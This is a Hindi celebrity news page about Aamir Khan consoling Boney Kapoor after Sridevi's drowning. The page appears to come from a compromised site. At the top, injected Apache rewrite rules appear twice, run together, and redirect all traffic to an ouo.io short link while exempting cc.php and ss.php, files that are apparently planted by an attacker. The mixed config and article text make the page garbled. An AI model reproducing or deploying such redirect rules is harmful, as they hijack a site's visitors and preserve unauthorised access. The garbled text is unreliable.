
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 376
Previous Nextदिल्ली। श्रीदेवी की अचानक मौत के बाद उनका परिवार पूरी तरह से टूट गया है। वहीं, अपनी 'जान' के चले जाने से बोनी कपूर भी काफी परेशान है। बता दें कि श्रीदेवी की मौत 24 फरवरी को बाथटब में डूबने से हुई थी। 28 फरवरी को उनका अंतिम संस्कार किया गया और उसमें श्रीदेवी के अच्छे दोस्त आमिर खान नहीं पहुंच पाए थे। आमिर खान उस समय विदेश में थे। हाल ही में उन्होंने अपने करीबी दोस्त बोनी कपूर को फोन कर उन्हें सहानुभूति दी। इस दौरान 24 फरवरी को हुई पूरी घटना बोनी कपूर ने आमिर खान को बताई। दोनों के बीच हुई इस बात की जानकारी एक ट्रेड एनालिस्ट ने दी है। फोन पर हुई बातचीत के दौरान आमिर ने बोनी को बताया कि ठीक ऐसा ही हादसा उनके दोस्त की पत्नी के साथ भी हुआ था। दोस्त की पत्नी का आधे से ज्यादा चेहरा बाथटब में डूब गया था। हालांकि उनके दोस्त ने टाइम पर अपनी पत्नी को बाहर खींच लिया था। जब उन्होंने अपनी पत्नी को पानी से बाहर निकाला तो वो बेसुध थीं। होश में आने के बाद जब उनसे पूछा गया कि अचानक उन्हें क्या हो गया था तो पत्नी ने जवाब दिया कि उन्हें नहीं पता अचानक उन्हें क्या हो गया था। लेकिन बाद में पता लगा कि उनके दोस्त की पत्नी को लो ब्लड प्रेशर की शिकायत हो गई थी। उनके दोस्त ने बताया कि ब्लड प्रेशर लो होने के कारण ही वो बेहोश हो गई थीं। उनका ब्लड प्रेशर लो था और फिर वे गर्म पानी से नहाने चली गईं। ऐसे में उनका ब्लड प्रेशर और बिगड़ गया और वे बेहोश हो गईं। अगर उनके दोस्त समय पर नहीं पहुंचते तो उन्हें भी पता नहीं चलता कि उनकी पत्नी के साथ क्या हुआ। आमिर ने बताया कि उन्हें महसूस हो रहा था कि जब वो अपने दोस्त का किस्सा बता रहे थे तो बोनी कपूर उस समय श्रीदेवी के साथ हुए हादसे को दोहरा रहे थे और थोड़ी देर में वो बच्चों की तरह फोन पर रोने लगें।